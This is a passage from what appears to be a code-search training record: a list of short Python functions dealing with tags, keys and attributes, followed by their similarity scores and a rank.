Highlight.objects.filter(tags='dyk').order_by('?')\r\n\tif did_you_know != '':\r\n\t\treturn {'did_you_know': did_you_know}\r\n\telse:\r\n\t\treturn ''", "def get_default_tag(self, tags):\n tags_counter = Counter()\n for tag in tags:\n tags_counter[tag] += 1\n\n if len(tags_counter) == 2 and list(tags_counter.values())[0] == list(tags_counter.values())[1]:\n return ut.find_positive_tag(tags_counter.keys())\n\n return tags_counter.most_common(1)[0][0]", "def _nonkey():\n def not_key(s):\n return not (lexer.singularize(s.lower()) in pattern_key)\n def p(tok):\n return tok.type == 'WORD' and not_key(tok.value)\n return next_word().if_test(p)", "def get_tag(self, key):\n return self._entries[key]", "def find_info( attr, kw, metadata, default='' ):\n str_attr = str(attr)\n return kw.get( str_attr, metadata.get( str_attr, default ) )", "def get_wordnet_pos(tag):\n tag_dict = {\"J\": wordnet.ADJ,\n \"N\": wordnet.NOUN,\n \"V\": wordnet.VERB,\n \"R\": wordnet.ADV}\n\n return tag_dict.get(tag.upper(), wordnet.NOUN)", "def name_highway_key(tags):\r\n if 
'name' not in tags:\r\n return None\r\n\r\n if 'highway' not in tags:\r\n return None\r\n \r\n if not tags['name'] or not tags['highway']:\r\n return None\r\n \r\n return tags['name'], tags['highway']", "def is_ignore(self):\n return self._tag == 'ignore'", "def findPOS(word):\r\n\t\r\n lisPOS = list(wordtags[word])\r\n if \"ADJ\" in lisPOS:\r\n return \"ADJECTIVE\"\r\n if \"ADV\" in lisPOS:\r\n return \"ADVERB\"\r\n if \"NOUN\" in lisPOS:\r\n return \"NOUN\"", "def get_tag(self, tag_name):\n tag_values = []\n for tag in self.tags:\n if tag.tag_name == tag_name:\n tag_values.append(tag.tag_value)\n\n if len(tag_values) == 1:\n if tag_values[0].lower() == 'true':\n return True\n elif tag_values[0].lower() == 'false':\n return False\n else:\n return tag_values[0]\n elif len(tag_values) > 1:\n return tag_values\n else:\n return False", "def get_tag(self, tag_name):\n tag_values = []\n for tag in self.tags:\n if tag.tag_name == tag_name:\n tag_values.append(tag.tag_value)\n\n if len(tag_values) == 1:\n if tag_values[0].lower() == 'true':\n return True\n elif tag_values[0].lower() == 'false':\n return False\n else:\n return tag_values[0]\n elif len(tag_values) > 1:\n return tag_values\n else:\n return False", "def get(self, tagname):\n return self.tags.setdefault(tagname, ModelTag(tagname))", "def _get_lsp_config_isis_ignore_metric(self):\n return self.__lsp_config_isis_ignore_metric", "def network_ref_modifier_key(tags):\r\n if 'network' not in tags:\r\n return None\r\n\r\n if 'ref' not in tags:\r\n return None\r\n \r\n if not tags['network'] or not tags['ref']:\r\n return None\r\n \r\n return tags['network'], tags['ref'], tags.get('modifier', '')", "def tag_condition(self):\n return self._tag_condition", "def is_explicit(self) -> bool:\r\n return EXPLICIT_TAG in self._item[\"tags\"]", "def nic_tag_type(self):\n # return type of the nictag or empty string if self.nic_tag is not found in Node.all_nictags\n return Node.all_nictags().get(self.nic_tag, '')", "def get_flag(self):\n price_data = self.get_price_data()\n if price_data.get('flag'):\n return price_data.get('flag')\n return None", "def tag_policy(self) -> Optional[pulumi.Input['MonitorConfigPolicyTagPolicyArgs']]:\n return pulumi.get(self, \"tag_policy\")", "def tag_policy(self) -> Optional[pulumi.Input['MonitorConfigPolicyTagPolicyArgs']]:\n return pulumi.get(self, \"tag_policy\")", "def tag(self) -> str:\n return pulumi.get(self, \"tag\")", "def get_tag_context(self, ctx, tag_name):\n # We want the error to fall through if the global tags don't work.\n if self.config.hexists(\"config:tags:global\", tag_name):\n return \"global\"\n\n if not isinstance(ctx.message.channel, DMChannel):\n try:\n if self.config.hexists(\"guild:{}:tags\".format(ctx.message.guild.id), tag_name):\n return \"guild\"\n except RedisError:\n pass\n\n try:\n if self.config.hexists(\"chan:{}:tags\".format(ctx.message.channel.id), tag_name):\n return \"chan\"\n else:\n return None\n except RedisError:\n return None", "def unknown(self, w):\n return not(w in self.word_tags)", "def get(self, key: str, default: Optional[str] = None) -> Optional[str]:\n if key == \"Dinosaur\":\n return \"NewDinosaur\"\n return key", "def _getatt(attrs, key, ns=None, default=None):\n keytuple = (ns, unicode(key))\n if attrs.has_key(keytuple):\n result = attrs[keytuple]\n else:\n result = default\n return result", "def get_unknown_opttrans_attr(path):\n path_attrs = path.pathattr_map\n unknown_opt_tran_attrs = {}\n for _, attr in path_attrs.items():\n if (isinstance(attr, 
BGPPathAttributeUnknown) and\n attr.flags & (BGP_ATTR_FLAG_OPTIONAL |\n BGP_ATTR_FLAG_TRANSITIVE)) or \\\n isinstance(attr, BGPPathAttributeAs4Path) or \\\n isinstance(attr, BGPPathAttributeAs4Aggregator):\n unknown_opt_tran_attrs[attr.type] = attr\n\n return unknown_opt_tran_attrs", "def unknown_starttag(self, tag, attrs):\n if tag in self.valid_tags:\n self.result = self.result + '<' + tag\n for k, v in attrs:\n if (string.lower(k[0:2]) != 'on' and\n string.lower(v[0:10]) != 'javascript'):\n self.result = '%s %s=\"%s\"' % (self.result, k, v)\n endTag = '</%s>' % tag\n self.endTagList.insert(0, endTag)\n self.result = self.result + '>'", "def start_tag_or_none(self, token):\n if self.patterns['start_tag'].match(token):\n return token[2:-6].upper()", "def ignoretag(self, node):\n return self.construct_mapping(node)", "def _get_tag(self, tag):\n return self.prefix + tag", "def ner_tag_advertise(self, advertise: Dict[str, Any]):\n tmp_ad = advertise.copy()\n full_str: str = sc.debug_print(\n self.splitting_marking(text_input=tmp_ad[\"clean_text\"],\n ner_map=self.non_measure_map,\n measure_map=self.measure_map), self.debug)\n\n terms_input: List[str] = sc.debug_print(\n [self.reg_rules[\"ngram_clear_rgx\"].sub(\"\", word[0])\n for word in self.reg_rules[\"ngram_rgx\"].findall(full_str)], self.debug)\n\n model_input: [(str, (str, ...))] = sc.debug_print(self.get_tagged_sequence(terms_input), self.debug)\n\n # Build conflict dictionary\n clean_inputs: [(str, str)] = []\n conflict_words = dict()\n for word, ne in model_input:\n if len(ne) > 1:\n if word in conflict_words.keys():\n for tag in ne:\n conflict_words[word].add(tag)\n else:\n conflict_words[word] = {*ne}\n clean_inputs.append((word, random.choice(ne)))\n else:\n clean_inputs.append((word, ne[0]))\n\n tmp_ad[\"NER\"] = clean_inputs\n return tmp_ad", "def safely_get_data(element, key):\n try:\n for child in element:\n if child.tag == key:\n return child.text\n except:\n return \"not found\"", "def get_jurisdiction_flag(data: dict) -> str:\n try:\n within_juris = data[\"event\"][\"data\"][\"new\"][\"austin_full_purpose\"] == \"Y\"\n return \"Y\" if within_juris else \"N\"\n except (TypeError, KeyError):\n return \"N\"", "def getValue(tree, tag):\n try:\n return tree.find(tag).text\n except AttributeError:\n return None", "def filter_gt_firsttag(ground_truth):\n gt = {}\n for k, v in ground_truth.items():\n gt[k] = [v[0]]\n\n return gt", "def extract_gi_id(description):\n fields = description[1:].split('|')\n if 'gi' not in fields:\n return None\n return fields[1 + fields.index('gi')]", "def convert(tag):\r\n if is_noun(tag):\r\n return wn.NOUN\r\n if is_adjective(tag):\r\n return wn.ADJ", "def tag(self) -> 'Tag':\n # project/lineage must exist so let's fetch it outside of try-except\n project = self.project.key\n lineage = self.lineage.key\n try:\n generation = self.key\n except self.Listing.Empty: # generation doesn't exist\n LOGGER.debug('No previous generations found - using a null tag')\n return NOTAG\n return TAGS(self.registry, project, lineage, generation)", "def cypher_tag_keyword(self, variable_tag=\"tag\"):\n if not self.keyword:\n return \"\"\n return f'({variable_tag}{self.label}' + \\\n \"{\" + f'{self.databaseInfoTag[\"properties\"][\"keyword\"]}:\\'{self.keyword}\\'' + \"})\"", "def get_tag_class(stext, tag_=\"pre\"):\n if \"<\" + tag_ + \" class=\" in stext and \">\" in stext:\n sclass = stext.split('=')[1]\n sclass = sclass[:sclass.index('>')]\n if \"'\" in sclass:\n sclass = sclass.replace(\"'\", '')\n elif '\"' in 
sclass:\n sclass = sclass.replace('\"', '')\n else:\n sclass = \"\"\n return sclass", "def tag(self):\n return self._tag", "def filter_gt(ground_truth, tokeep):\n gt = {}\n for k, v in ground_truth.items():\n tags = []\n for t, w in v:\n if t in tokeep:\n tags.append([t, w])\n if tags:\n gt[k] = tags\n\n return gt", "def get(self, key):\n return \"\"", "def out_prob(self, word, tag):\n return self._out.get(tag, {}).get(word, 0)" ]
[ "0.80788904", "0.5658676", "0.550251", "0.54886025", "0.53662133", "0.53030056", "0.52832705", "0.5201634", "0.51524514", "0.5135101", "0.51192683", "0.5106311", "0.5085387", "0.50634223", "0.50538707", "0.5035368", "0.49847323", "0.4977521", "0.49762967", "0.49733838", "0.49426636", "0.49417284", "0.4923227", "0.49155444", "0.4910193", "0.49023953", "0.48983893", "0.48889503", "0.4886947", "0.48731405", "0.48656043", "0.4856606", "0.4850074", "0.4847536", "0.4846674", "0.4833651", "0.48140973", "0.48041105", "0.47915995", "0.47907677", "0.47873417", "0.47631544", "0.4760686", "0.47550023", "0.47493812", "0.47464025", "0.47291413", "0.47206864", "0.47193947", "0.47139356", "0.47082755", "0.47009566", "0.46883738", "0.46727273", "0.46641353", "0.4660467", "0.46550825", "0.4650711", "0.4649755", "0.46417767", "0.4640409", "0.463057", "0.46284664", "0.46238855", "0.46193042", "0.46177393", "0.46177393", "0.46139956", "0.460673", "0.4605933", "0.45908666", "0.45907122", "0.4579428", "0.45790648", "0.45733443", "0.45733443", "0.45637316", "0.45588952", "0.45377848", "0.45328695", "0.45275876", "0.45240888", "0.45086887", "0.45085832", "0.4501207", "0.45005253", "0.4493115", "0.44913924", "0.44909558", "0.4488102", "0.4487159", "0.4481208", "0.44775364", "0.44768116", "0.44755086", "0.44711968", "0.44681373", "0.44603112", "0.44538096", "0.44530153" ]
0.8014554
1
Returns true if the object (instance, volume, snapshot, AMI) has a tag with 'PROD' for key
def isProduction(obj): return 'PROD' in obj.tags # This is deprecated? obj.tags.has_key('PROD')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def tag_key_exists(self, key):\n return key in self.map", "def hastag(obj, key):\n key = TAG_PREFIX + key\n if not isinstance(obj, unittest.TestCase):\n return hasattr(obj, key)\n tc_method = getattr(obj, obj._testMethodName)\n return hasattr(tc_method, key) or hasattr(obj, key)", "def is_attribute(tag, kmip_version=None):\n kmip_1_0_attribute_tags = [\n Tags.UNIQUE_IDENTIFIER,\n Tags.NAME,\n Tags.OBJECT_TYPE,\n Tags.CRYPTOGRAPHIC_ALGORITHM,\n Tags.CRYPTOGRAPHIC_LENGTH,\n Tags.CRYPTOGRAPHIC_PARAMETERS,\n Tags.CRYPTOGRAPHIC_DOMAIN_PARAMETERS,\n Tags.CERTIFICATE_TYPE,\n Tags.CERTIFICATE_IDENTIFIER,\n Tags.CERTIFICATE_SUBJECT,\n Tags.CERTIFICATE_ISSUER,\n Tags.DIGEST,\n Tags.OPERATION_POLICY_NAME,\n Tags.CRYPTOGRAPHIC_USAGE_MASK,\n Tags.LEASE_TIME,\n Tags.USAGE_LIMITS,\n Tags.STATE,\n Tags.INITIAL_DATE,\n Tags.ACTIVATION_DATE,\n Tags.PROCESS_START_DATE,\n Tags.PROTECT_STOP_DATE,\n Tags.DEACTIVATION_DATE,\n Tags.DESTROY_DATE,\n Tags.COMPROMISE_OCCURRENCE_DATE,\n Tags.COMPROMISE_DATE,\n Tags.REVOCATION_REASON,\n Tags.ARCHIVE_DATE,\n Tags.OBJECT_GROUP,\n Tags.LINK,\n Tags.APPLICATION_SPECIFIC_INFORMATION,\n Tags.CONTACT_INFORMATION,\n Tags.LAST_CHANGE_DATE,\n Tags.CUSTOM_ATTRIBUTE\n ]\n kmip_1_1_attribute_tags = copy.deepcopy(kmip_1_0_attribute_tags) + [\n Tags.CERTIFICATE_LENGTH,\n Tags.X_509_CERTIFICATE_IDENTIFIER,\n Tags.X_509_CERTIFICATE_SUBJECT,\n Tags.X_509_CERTIFICATE_ISSUER,\n Tags.DIGITAL_SIGNATURE_ALGORITHM,\n Tags.FRESH\n ]\n kmip_1_2_attribute_tags = copy.deepcopy(kmip_1_1_attribute_tags) + [\n Tags.ALTERNATIVE_NAME,\n Tags.KEY_VALUE_PRESENT,\n Tags.KEY_VALUE_LOCATION,\n Tags.ORIGINAL_CREATION_DATE\n ]\n kmip_1_3_attribute_tags = copy.deepcopy(kmip_1_2_attribute_tags) + [\n Tags.RANDOM_NUMBER_GENERATOR\n ]\n kmip_1_4_attribute_tags = copy.deepcopy(kmip_1_3_attribute_tags) + [\n Tags.PKCS12_FRIENDLY_NAME,\n Tags.DESCRIPTION,\n Tags.COMMENT,\n Tags.SENSITIVE,\n Tags.ALWAYS_SENSITIVE,\n Tags.EXTRACTABLE,\n Tags.NEVER_EXTRACTABLE\n ]\n kmip_2_0_attribute_tags = copy.deepcopy(kmip_1_4_attribute_tags) + [\n Tags.CERTIFICATE_SUBJECT_CN,\n Tags.CERTIFICATE_SUBJECT_O,\n Tags.CERTIFICATE_SUBJECT_OU,\n Tags.CERTIFICATE_SUBJECT_EMAIL,\n Tags.CERTIFICATE_SUBJECT_C,\n Tags.CERTIFICATE_SUBJECT_ST,\n Tags.CERTIFICATE_SUBJECT_L,\n Tags.CERTIFICATE_SUBJECT_UID,\n Tags.CERTIFICATE_SUBJECT_SERIAL_NUMBER,\n Tags.CERTIFICATE_SUBJECT_TITLE,\n Tags.CERTIFICATE_SUBJECT_DC,\n Tags.CERTIFICATE_SUBJECT_DN_QUALIFIER,\n Tags.CERTIFICATE_ISSUER_CN,\n Tags.CERTIFICATE_ISSUER_O,\n Tags.CERTIFICATE_ISSUER_OU,\n Tags.CERTIFICATE_ISSUER_EMAIL,\n Tags.CERTIFICATE_ISSUER_C,\n Tags.CERTIFICATE_ISSUER_ST,\n Tags.CERTIFICATE_ISSUER_L,\n Tags.CERTIFICATE_ISSUER_UID,\n Tags.CERTIFICATE_ISSUER_SERIAL_NUMBER,\n Tags.CERTIFICATE_ISSUER_TITLE,\n Tags.CERTIFICATE_ISSUER_DC,\n Tags.CERTIFICATE_ISSUER_DN_QUALIFIER,\n Tags.KEY_FORMAT_TYPE,\n Tags.NIST_KEY_TYPE,\n Tags.OPAQUE_DATA_TYPE,\n Tags.PROTECTION_LEVEL,\n Tags.PROTECTION_PERIOD,\n Tags.PROTECTION_STORAGE_MASK,\n Tags.QUANTUM_SAFE,\n Tags.SHORT_UNIQUE_IDENTIFIER,\n Tags.ATTRIBUTE\n ]\n kmip_2_0_attribute_tags.remove(Tags.CERTIFICATE_IDENTIFIER)\n kmip_2_0_attribute_tags.remove(Tags.CERTIFICATE_SUBJECT)\n kmip_2_0_attribute_tags.remove(Tags.CERTIFICATE_ISSUER)\n kmip_2_0_attribute_tags.remove(Tags.OPERATION_POLICY_NAME)\n kmip_2_0_attribute_tags.remove(Tags.CUSTOM_ATTRIBUTE)\n\n if kmip_version == KMIPVersion.KMIP_1_0:\n return tag in kmip_1_0_attribute_tags\n elif kmip_version == KMIPVersion.KMIP_1_1:\n return tag in kmip_1_1_attribute_tags\n elif kmip_version == 
KMIPVersion.KMIP_1_2:\n return tag in kmip_1_2_attribute_tags\n elif kmip_version == KMIPVersion.KMIP_1_3:\n return tag in kmip_1_3_attribute_tags\n elif kmip_version == KMIPVersion.KMIP_1_4:\n return tag in kmip_1_4_attribute_tags\n elif kmip_version == KMIPVersion.KMIP_2_0:\n return tag in kmip_2_0_attribute_tags\n else:\n all_attribute_tags = set(\n kmip_1_0_attribute_tags +\n kmip_1_1_attribute_tags +\n kmip_1_2_attribute_tags +\n kmip_1_3_attribute_tags +\n kmip_1_4_attribute_tags +\n kmip_2_0_attribute_tags\n )\n return tag in all_attribute_tags", "def tag_dict_contains (self,\r\n tag):\r\n\r\n\r\n\r\n if self.using_database:\r\n aprint('TAGDICT CONTAINS')\r\n value_tuple = (notebookname, tag,)\r\n db_cursor.execute(\"SELECT rowid \"\r\n +\"FROM tags_to_keys\"\r\n +\" WHERE notebook=?\"\r\n +\" AND tag=?;\",\r\n value_tuple)\r\n try:\r\n return db_cursor.fetchone()[0] # MIGHT BE PROBLEMATIC\r\n except:\r\n return False\r\n\r\n return str(tag) in self.tag_dict", "def _is_incex_key(self, key, value):\n key_out = ((self.included_attributes and\n (key not in self.included_attributes)) or\n (key in self.excluded_attributes))\n value_out = True\n if isinstance(value, dict):\n for change_key in value:\n if isinstance(value[change_key], dict):\n for key in value[change_key]:\n if ((self.included_attributes and\n (key in self.included_attributes)) or\n (key not in self.excluded_attributes)):\n value_out = False\n return key_out and value_out", "def prod(environment):\n return environment == 'live' or environment == 'debug' or environment == 'prod'", "def can_tag(self):\n try:\n self.cork.require(role='beta-archivist')\n return True\n except Exception:\n return False", "def is_tagged(self, instance_id, tag_name):\n tag_value = self.get_tag_for_instance(instance_id, tag_name)\n if tag_value is not None and tag_value == 'true':\n return True\n else:\n return False", "def has_attribute(self, key):\n return key in self.__dict", "def _does_product_contains_given_attributes(self, product, *attrs):\n\n for attribute in list(attrs[0]):\n if not product.get(attribute):\n return False\n\n return True", "def contains(self, key):\n try:\n self.keyvaluepair_set.get(key=key)\n return True\n except KeyValuePair.DoesNotExist:\n return False", "def __contains__(self, key):\n return key in self._tagged_values_dict and self._is_visible(key)", "def __contains__(self, key):\n return key in self._group._opts", "def has_tag(self, tag):\n return tag in self.tags", "def has_tag(self, tag):\n return tag in self.tags", "def is_tagged(self,tag_name,element):\n return (tag_name in self.tag2elements.keys()) and (element in self.tag2elements[tag_name])", "def has_attr(self, key):\n return key in self.attrs", "def has(self, key):", "def __contains__(self, key):\n return key in self._get_storage()", "def is_tag_available(self, tag):\n return tag in self.available_tags", "def check_if_app_engine_job(tagkey, tagvalue):\n\n if (tagkey == '@app_engine_flex') and (':' in tagvalue):\n return True\n else:\n return False", "def IsTagExists(self, ResourceId, TagName):\n\n try:\n if self.Service == 'ec2':\n response = self.DescribeTags(ResourceId)\n if TagName in list(map(lambda x: x['Key'], [x for x in response['Tags']])):\n return True\n elif self.Service == 's3':\n response = self.GetBucketTagging(ResourceId)\n if TagName in list(map(lambda x: x['Key'], [x for x in response['TagSet']])):\n return True\n elif self.Service == 'lambda':\n response = self.ListTags(ResourceId)\n if TagName in [x for x in response['Tags']]:\n return 
True\n elif self.Service == 'logs':\n response = self.ListTagsLogGroup(ResourceId)\n if TagName in [x for x in response['tags']]:\n return True\n elif self.Service == 'rds':\n response = self.ListTagsForResource(ResourceId)\n if TagName in list(map(lambda x: x['Key'], [x for x in response['TagList']])):\n return True\n elif self.Service == 'es':\n response = self.ListTags(ResourceId)\n if TagName in list(map(lambda x: x['Key'], [x for x in response['TagList']])):\n return True\n elif self.Service == 'emr':\n response = self.DescribeCluster(ResourceId)\n if TagName in list(map(lambda x: x['Key'], [Tag for Tag in response['Cluster']['Tags']])):\n return True\n elif self.Service == 'dynamodb':\n response = self.ListTagsOfResource(ResourceId)\n if TagName in list(map(lambda x: x['Key'], [x for x in response['Tags']])):\n return True\n elif self.Service == 'firehose':\n response = self.ListTagsForDeliveryStream(ResourceId)\n if TagName in list(map(lambda x: x['Key'], [x for x in response['Tags']])):\n return True\n elif self.Service == 'glacier':\n response = self.ListTagsForVault(ResourceId)\n if TagName in [x for x in response['Tags']]:\n return True\n elif self.Service == 'kms':\n response = self.ListResourceTags(ResourceId)\n if TagName in list(map(lambda x: x['TagKey'], [x for x in response['Tags']])):\n return True\n elif self.Service == 'apigateway':\n print('No api to list tags')\n return False\n elif self.Service == 'kinesis':\n response = self.ListTagsForStream(ResourceId)\n if TagName in list(map(lambda x: x['Key'], [x for x in response['Tags']])):\n return True\n elif self.Service == 'cloudtrail':\n response = self.ListTags(ResourceId)\n TagsList = map(lambda RTL: RTL['TagsList'], [RTL for RTL in response['ResourceTagList']])\n for Tags in TagsList:\n for Tag in Tags:\n if Tag['Key'] == 'Channel':\n return True\n elif self.Service == 'sqs':\n response = self.ListTags(ResourceId)\n if TagName in [x for x in response['Tags']]:\n return True\n elif self.Service == 'secretsmanager':\n response = self.DescribeSecret(ResourceId)\n if TagName in list(map(lambda x: x['Key'], [x for x in response['Tags']])):\n return True\n elif self.Service == 'cloudfront':\n response = self.ListTagsForResource(ResourceId)\n if TagName in list(map(lambda x: x['Key'], [x for x in response['Tags']])):\n return True\n elif self.Service == 'efs':\n response = self.DescribeTags(ResourceId)\n if TagName in list(map(lambda x: x['Key'], [x for x in response['Tags']])):\n return True\n elif self.Service == 'sagemaker':\n response = self.ListTags(ResourceId)\n if TagName in list(map(lambda x: x['Key'], [x for x in response['Tags']])):\n return True\n elif self.Service == 'redshift':\n response = self.DescribeTags(ResourceId)\n if TagName in list(map(lambda x: x['Key'], [x for x in response['Tags']])):\n return True\n elif self.Service == 'elasticache':\n response = self.ListTagsForResource(ResourceId)\n if TagName in list(map(lambda x: x['Key'], [x for x in response['TagList']])):\n return True\n elif self.Service == 'workspaces':\n response = self.DescribeTags(ResourceId)\n if TagName in list(map(lambda x: x['Key'], [x for x in response['Tags']])):\n return True\n elif self.Service == 'ds':\n response = self.ListTagsForResource(ResourceId)\n if TagName in list(map(lambda x: x['Key'], [x for x in response['Tags']])):\n return True\n elif self.Service == 'dax':\n response = self.ListTags(ResourceId)\n if TagName in list(map(lambda x: x['Key'], [x for x in response['Tags']])):\n return True\n elif self.Service == 
'route53':\n response = self.ListTagsForResource(ResourceId)\n if TagName in list(map(lambda x: x['Key'], [x for x in response['Tags']])):\n return True\n elif self.Service == 'directconnect':\n response = self.DescribeTags(ResourceId)\n if TagName in list(map(lambda x: x['Key'], [x for x in response['Tags']])):\n return True\n elif self.Service == 'datapipeline':\n response = self.DescribePipelines(ResourceId)\n Tags = list(map(lambda x: x['tags'], [tags for tags in response['pipelineDescriptionList']]))\n for i in Tags:\n for j in i:\n if j['key'] == 'Channel':\n return True\n else:\n raise TagNotSupportedError(self.Service)\n except Exception as e:\n raise e\n\n return False", "def is_filter_at_key(self, key):\n\n if self.has_key(key):\n attribute_status = getattr(self, key)\n if isinstance(attribute_status, self.__class__):\n return True\n\n return False", "def has_key(self, key):\n return key in self", "def _is_env_per_bucket():\n\n buckets = _get_buckets()\n if isinstance(buckets, dict):\n return True\n elif isinstance(buckets, list):\n return False\n else:\n raise ValueError(\"Incorrect s3.buckets type given in config\")", "def __contains__(self, key):\n if not isinstance(key, pm.general.Attribute):\n return super(ChannelBox, self).__contains__(key)\n else:\n for attr in self:\n if key.longName() == attr.longName():\n return True\n return False", "def dexists(self, name, key):\n return key in self.db[name]", "def has_key(self, key):\n return self.__dict__.has_key(key)", "def has(self, key: str) -> Any:\n return key in self.variables", "def _is_desired_tag(self, tag):\n if self._tags is None:\n return True\n\n if self._ignore_namespace:\n for desired_tag in self._tags:\n if tag.localname == desired_tag.localname:\n return True\n else:\n for desired_tag in self._tags:\n if tag == desired_tag:\n return True\n\n return False", "def hasValue(self, key):\n return self.has_key('__' + key)", "def check_if_already_prepared(self, instance, product_attribute):\n attribute_exist = self.search([('ks_shopify_instance', '=', instance.id),\n ('ks_product_attribute', '=', product_attribute.id)], limit=1)\n if attribute_exist:\n return attribute_exist\n else:\n return False", "def has_key(self, key):\n return key in self.db", "def __contains__(self, key):\n\t\treturn key in self.__dStore", "def __contains__(self, key):\n with SessionContext(self.SessionClass) as session:\n q = session.query(PAW2_DBObject)\n return q.filter(PAW2_DBObject.key == key).count() == 1", "def __contains__(self, key):\n return hasattr(self, key)", "def check_tag(self, session, tag):\n if not tag:\n return False\n\n try:\n self._tag(session.get, key=tag, session=session)\n return True\n except exceptions.NotFound:\n return False", "def has(self, key):\n return key in self._store", "def has_deep_key(obj, key):\n\tif isinstance(key, str):\n\t\tkey = key.split('.')\n\t\t\n\tlast_obj = obj\n\tfor v in key:\n\t\tif not last_obj.has_key(v):\n\t\t\treturn False\n\t\tlast_obj = last_obj[v]\n\t\n\treturn True", "def is_perCapita(key):", "def is_key_exists(client, bucket, key):\n\n response = client.list_objects_v2(\n Bucket=bucket,\n Prefix=key,\n )\n for obj in response.get('Contents', []):\n if obj['Key'] == key:\n return True\n else:\n return False", "def has_key(self, key):\n return self.contains(key)", "def __contains__(self, key):\n return key in self._opts or key in self._groups", "def exists(\n instance_id=None,\n name=None,\n tags=None,\n region=None,\n key=None,\n keyid=None,\n profile=None,\n in_states=None,\n 
filters=None,\n):\n instances = find_instances(\n instance_id=instance_id,\n name=name,\n tags=tags,\n region=region,\n key=key,\n keyid=keyid,\n profile=profile,\n in_states=in_states,\n filters=filters,\n )\n if instances:\n log.info(\"Instance exists.\")\n return True\n else:\n log.warning(\"Instance does not exist.\")\n return False", "def test_Container_Contains(self):\n test = \"key3\" in ee.Dictionary({\"key1\": 1, \"key2\": 2})\n self.assertIsInstance(test, bool)", "def has(self, key):\n return False", "def has_item(self, usage_key):\r\n return usage_key in self.modules[usage_key.course_key]", "def __contains__(self, key):\n self._remove_expired()\n\n log.debug(\"__contains__: {}\".format(key))\n return key in self._d", "def hasCustomData( self, key ):\n return str(key) in self._customData", "def __contains__(self, key):\n try:\n if self[key]:\n return True\n except KeyError:\n return False", "def is_production_environment(self):\n return self.get_current_environment() == Environment.PRODUCTION", "def has_tags(self):\n return bool(self.tags)", "def contains_key(kv_json, key):\n if isinstance(kv_json, str):\n kv_dict = loads(kv_json)\n try:\n res = kv_dict[key]\n return True\n except KeyError:\n return False\n else:\n print(\"Provide A JSON Key Value String\")", "def __contains__(cls, key):\n return cls.classCase(key) in cls._Registry", "def get_tag_for_instance(self, instance_id, tag_key):\n tags = self.get_tags_for_instance(instance_id)\n for tag in tags:\n if tag['Key'] == tag_key:\n return tag['Value']\n return None", "def checker(product):\n for item in INSTOCK:\n if item == product:\n return True\n return False", "def exists(cls, ko):\n if isinstance(ko, BagDocument):\n return ko._key in cls._dbag\n else:\n return ko in cls._dbag", "def containsKey(self, key):\n return get(key) != None", "def singularity_exists(self):\n instances = Client.instances(quiet=self.quiet)\n for instance in instances:\n if self.pid in instance.name:\n return True\n return False", "def has_key(self, key):\n return key.lower() in self._data", "def contains(self, key):\n if key in self.key_list:\n return True\n return False", "def has(self, tag, index):\n return self.get(tag, index) is not None", "def checker(self, product):\n for item in self.instock:\n if item == product:\n return True\n return False", "def __contains__(self, key: object) -> bool:\n if isinstance(key, str):\n key = key.casefold()\n for k in self._keys:\n if k.casefold() == key:\n return True\n return False", "def __contains__(self, key):\n return self.keys[self._linear_probe(key, \"contains\")] is not None", "def __contains__(self, key: str) -> bool:\n return key in self.raw", "def is_matching_product_with_tags(product, lat, lng, radius, tags):\n return vincenty(\n (lat, lng),\n (product.shop.lat, product.shop.lng)\n ).meters <= radius and any(tag in product.shop.tags for tag in tags)", "def __contains__(self, key):\n return self._lookup(key).value is not None", "async def isStorObj(app, key, bucket=None):\n found = False\n client = _getStorageClient(app)\n if not bucket:\n bucket = app['bucket_name']\n else:\n log.debug(f\"using bucket: [{bucket}]\")\n log.debug(f\"isStorObj {bucket}/{key}\")\n\n found = False\n\n try:\n contents = await client.list_keys(bucket=bucket, limit=1, prefix=key)\n if contents:\n item = contents[0]\n print(\"item:\", item)\n if item == key:\n # if the key is a S3 folder, the key will be the first object in the folder,\n # not the requested object\n found = True\n\n except HTTPNotFound:\n pass # key does not 
exist\n\n log.debug(f\"isStorObj {key} returning {found}\")\n return found", "def exists(self, key):\n try:\n return (self.salt + str(key)) in self.DB\n except KeyError:\n return False", "def __contains__(self, key):\n if isinstance(key, Model):\n key = key.get_id()\n return (str(key) in self.get_models())", "def on_production(self):\n\n if not self.is_valid_platform() and not self.in_build():\n return False\n prod_branch = 'production' if self.on_dedicated() else 'master'\n return self['BRANCH'] == prod_branch", "def contains(self, key):\n\n return key in self.keys()", "def should_tag_volumes(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"should_tag_volumes\")", "def should_tag_volumes(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"should_tag_volumes\")", "def key_dict_contains (self,\r\n key):\r\n\r\n\r\n\r\n if self.using_database:\r\n\r\n aprint('KEYDICT CONTAINS')\r\n value_tuple = (notebookname, key,)\r\n db_cursor.execute(\"SELECT note_index\"\r\n +\" FROM keys_to_indexes\"\r\n +\" WHERE notebook=?\"\r\n +\" AND keyword=?;\",\r\n value_tuple)\r\n try:\r\n if db_cursor.fetchone()[0]:\r\n return True\r\n return False # MIGHT BE PROBLEMATIC\r\n except:\r\n return False\r\n\r\n return str(key) in self.key_dict", "def __contains__(self, key):\n return key in self.keys", "def __contains__(self, key):\n try:\n self._get(key)\n return True\n except Exception:\n return False", "def has(self, key):\n return self.data.get(key, None) is not None", "def __check_metadata(s3client, key, bucket_name):\n response = s3client.head_object(Bucket=bucket_name, Key=key)\n if 'status' in response['Metadata']:\n return response['Metadata']['status'] == 'uploaded'\n return False", "def check_key(key, options):\n animal_id, exp_date, exp_type = key.split('_')\n if ((options.animal_id is None or animal_id == options.animal_id)\n and (options.exp_date is None or exp_date == options.exp_date)\n and (options.exp_type is None or exp_type == options.exp_type)):\n return True\n else:\n return False", "def contains(self, key: int) -> bool:\n if key in self.d:\n return True\n else:\n return False", "def is_key_active(self,key):\n try: key = key.public_key()\n except: pass\n\n serialized = key.public_bytes(\n encoding = serialization.Encoding .OpenSSH,\n format = serialization.PublicFormat.OpenSSH)\n\n blob = b64decode(serialized.split(None,2)[1])\n active_keys = list(self.query_active_keys())\n\n for active_key in active_keys:\n if active_key[0] == blob:\n return True\n\n return False", "def check_image_local(self, tag):\n tags = self.get_tags()\n return (tag in tags)", "def __contains__(self, key):\n\n return key in self.keys_set", "def exist(self, key):\n record = self._storage.get(key, None)\n if record:\n return record.ttl >= time.time()\n return False", "def __contains__(self, key):\n try:\n self[key]\n return True\n except:\n return False", "def capitalize_tag_kv(service: str) -> bool:\n return service in (\"ec2\", \"iam\", \"ssm\")", "def 